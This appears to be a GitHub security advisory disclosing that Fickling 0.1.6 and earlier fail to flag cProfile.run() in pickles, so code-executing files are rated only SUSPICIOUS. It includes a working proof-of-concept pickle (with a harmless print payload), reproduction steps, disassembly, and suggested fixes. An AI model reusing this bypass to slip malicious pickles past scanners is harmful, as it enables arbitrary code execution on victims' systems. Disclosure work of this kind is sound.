Headline
GHSA-p523-jq9w-64x9: Fickling Blocklist Bypass: cProfile.run()
Fickling’s assessment
cProfile was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43).
Original report
Description
Summary
Fickling versions up to and including 0.1.6 do not treat Python’s cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.
If a user relies on Fickling’s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.
This affects any workflow or product that uses Fickling as a security gate for pickle deserialization.
Details
The cProfile module is missing from Fickling’s blocklist of unsafe module imports in fickling/analysis.py. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).
Affected source code:
- File: fickling/analysis.py
- Class: UnsafeImports
- Issue: The blocklist does not include cProfile, cProfile.run, or cProfile.runctx
Reference to similar fix:
- PR #187 added pty to the blocklist to fix CVE-2025-67748
- PR #108 documented the blocklist approach
- The same fix pattern should be applied for cProfile
How the bypass works:
- The attacker creates a pickle that calls cProfile.run() in __reduce__
- cProfile.run() accepts a Python code string and executes it directly (it is the C-accelerated version of profile.run)
- Fickling’s UnsafeImports analysis does not flag cProfile as dangerous (see the sketch after this list)
- Only the UnusedVariables heuristic triggers, resulting in SUSPICIOUS severity
- The pickle should be rated OVERTLY_MALICIOUS like os.system, eval, and exec
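To make the membership-test nature of the bypass concrete, here is a purely illustrative sketch; this is not fickling’s actual code, and the names UNSAFE_MODULES and flags_import are hypothetical. A blocklist-based import check ultimately reduces to a set lookup, so any module name absent from the set, such as cProfile, passes without raising the severity.

```python
# Illustrative only -- not fickling's actual implementation.
# A blocklist-based import check boils down to a membership test, so any module
# missing from the set (here, cProfile) is never flagged.
UNSAFE_MODULES = {"os", "subprocess", "builtins", "pty"}  # hypothetical contents

def flags_import(module: str) -> bool:
    return module in UNSAFE_MODULES

print(flags_import("os"))        # True  -> raised to an overtly malicious rating
print(flags_import("cProfile"))  # False -> only heuristics such as UnusedVariables fire
```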
Tested behavior (fickling 0.1.6):
| Function | Fickling Severity | RCE Capable |
|---|---|---|
| os.system | LIKELY_OVERTLY_MALICIOUS | Yes |
| eval | OVERTLY_MALICIOUS | Yes |
| exec | OVERTLY_MALICIOUS | Yes |
| cProfile.run | SUSPICIOUS | Yes ← BYPASS |
| cProfile.runctx | SUSPICIOUS | Yes ← BYPASS |
Suggested fix:
Add to the unsafe imports blocklist in fickling/analysis.py:
- cProfile
- cProfile.run
- cProfile.runctx
- _lsprof (underlying C module)
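Until such a blocklist addition lands, a pipeline that gates on fickling could add its own pre-check. The sketch below is one hedged option, not part of fickling: it uses the standard-library pickletools module to pull module names out of GLOBAL/STACK_GLOBAL opcodes and rejects files that reference the profiler modules. The names EXTRA_UNSAFE_MODULES and find_imported_modules are illustrative, and the STACK_GLOBAL handling is a best-effort heuristic that assumes the module string is pushed immediately before the attribute name, as in the disassembly shown later in this report.

```python
import pickletools

# Caller-side mitigation sketch (not part of fickling). Reject a pickle up front if it
# references the profiler modules that can exec() arbitrary code strings.
EXTRA_UNSAFE_MODULES = {"cProfile", "profile", "_lsprof"}

def find_imported_modules(data: bytes) -> set[str]:
    modules = set()
    recent_strings = []  # string constants pushed before a STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            recent_strings.append(arg)
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            modules.add(recent_strings[-2])    # module string precedes the attribute name
        elif opcode.name in ("GLOBAL", "INST"):
            modules.add(arg.split(" ", 1)[0])  # pickletools reports these as "module name"
    return modules

with open("malicious.pkl", "rb") as f:
    payload = f.read()

if find_imported_modules(payload) & EXTRA_UNSAFE_MODULES:
    raise ValueError("pickle references a profiler module that can execute arbitrary code")
```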
PoC
Complete instructions to reproduce the vulnerability, including environment details, follow.
Environment:
- Python 3.13.2
- fickling 0.1.6 (latest version at the time of the report, installed via pip)
Step 1: Create malicious pickle
import pickle
import cProfile

class MaliciousPayload:
    def __reduce__(self):
        # On unpickling, REDUCE calls cProfile.run(...), which exec()s the string
        return (cProfile.run, ("print('CPROFILE_RCE_CONFIRMED')",))

with open("malicious.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)
Step 2: Analyze with fickling
from fickling.fickle import Pickled
from fickling.analysis import check_safety
with open('malicious.pkl', 'rb') as f:
    data = f.read()
pickled = Pickled.load(data)
result = check_safety(pickled)
print(f"Severity: {result.severity}")
print(f"Analysis: {result}")
Expected output (if properly detected):
Severity: Severity.OVERTLY_MALICIOUS
Actual output (bypass confirmed):
Severity: Severity.SUSPICIOUS
Analysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file
Step 3: Prove RCE by loading the pickle
python -c "import pickle; pickle.load(open('malicious.pkl', 'rb'))"
Output
CPROFILE_RCE_CONFIRMED
4 function calls in 0.000 seconds
Ordered by: standard name
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.000 0.000 0.000 0.000 <string>:1(<module>)
1 0.000 0.000 0.000 0.000 {built-in method builtins.exec}
1 0.000 0.000 0.000 0.000 {built-in method builtins.print}
1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}
Check: The code executes, proving RCE.
Pickle disassembly (evidence):
0: \x80 PROTO 5
2: \x95 FRAME 58
11: \x8c SHORT_BINUNICODE 'cProfile'
21: \x94 MEMOIZE (as 0)
22: \x8c SHORT_BINUNICODE 'run'
27: \x94 MEMOIZE (as 1)
28: \x93 STACK_GLOBAL
29: \x94 MEMOIZE (as 2)
30: \x8c SHORT_BINUNICODE "print('CPROFILE_RCE_CONFIRMED')"
63: \x94 MEMOIZE (as 3)
64: \x85 TUPLE1
65: \x94 MEMOIZE (as 4)
66: R REDUCE
67: \x94 MEMOIZE (as 5)
68: . STOP
highest protocol among opcodes = 4
Impact
Vulnerability Type:
Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).
Who is impacted:
Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:
- ML model validation pipelines
- Model hosting platforms (Hugging Face, MLflow, etc.)
- Security scanning tools that use fickling
- CI/CD pipelines that validate pickle artifacts
Attack scenario:
An attacker uploads a malicious ML model or pickle file to a model repository. The victim’s pipeline uses fickling to scan uploads. Fickling rates the file as “SUSPICIOUS” (not “OVERTLY_MALICIOUS”), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.
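As a concrete illustration of that scenario, a gate script along the following lines would wave the cProfile payload through because SUSPICIOUS is not in its rejection set. This is a hypothetical sketch: it reuses the check_safety API from the PoC above, assumes Severity is a standard Enum so its .name attribute is available, and the rejection set is an assumption about how such a gate might be tuned.

```python
from fickling.fickle import Pickled
from fickling.analysis import check_safety

# Hypothetical upload gate. Assumes Severity is a standard Enum (so .name is available);
# the rejection set reflects a pipeline that only blocks the highest-severity ratings.
REJECTED = {"LIKELY_OVERTLY_MALICIOUS", "OVERTLY_MALICIOUS"}

def is_accepted(path: str) -> bool:
    with open(path, "rb") as f:
        result = check_safety(Pickled.load(f.read()))
    return result.severity.name not in REJECTED

# On fickling <= 0.1.6, the cProfile.run() payload is rated SUSPICIOUS, so it passes.
print(is_accepted("malicious.pkl"))  # True -> the malicious model reaches pickle.load()
```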
Why cProfile.run() is dangerous:
Unlike runpy.run_path(), which requires a file on disk, cProfile.run() takes a code string directly, so the entire attack is self-contained in the pickle; no external files are needed. The Python docs explicitly state that cProfile.run() takes "a single argument that can be passed to the exec() function".
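A one-liner is enough to see this behavior in the standard library. The example below is harmless, but the statement being "profiled" could be any attacker-chosen code:

```python
import cProfile

# cProfile.run() passes its first argument to exec(), so the "profiled" statement
# can be any Python code. Here it just prints the current process ID.
cProfile.run("import os; print('running as pid', os.getpid())")
```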
cProfile is the C-accelerated version and is more commonly available than profile. It’s also the recommended profiler per Python docs (“cProfile is recommended for most users”), so it’s present in virtually all Python installations.
Severity: HIGH
- The attacker achieves arbitrary code execution
- The security control (fickling) is specifically designed to prevent this
- The bypass requires no special conditions beyond crafting the pickle with cProfile
- Attack is fully self-contained (no external files needed)
- cProfile is more commonly used than profile, increasing attack surface
References
- GHSA-565g-hwwr-4pp3
- GHSA-p523-jq9w-64x9
- GHSA-r7v6-mfhq-g3m2
- trailofbits/fickling#108
- trailofbits/fickling#187
- trailofbits/fickling#195
- trailofbits/fickling@dc8ae12
- https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L116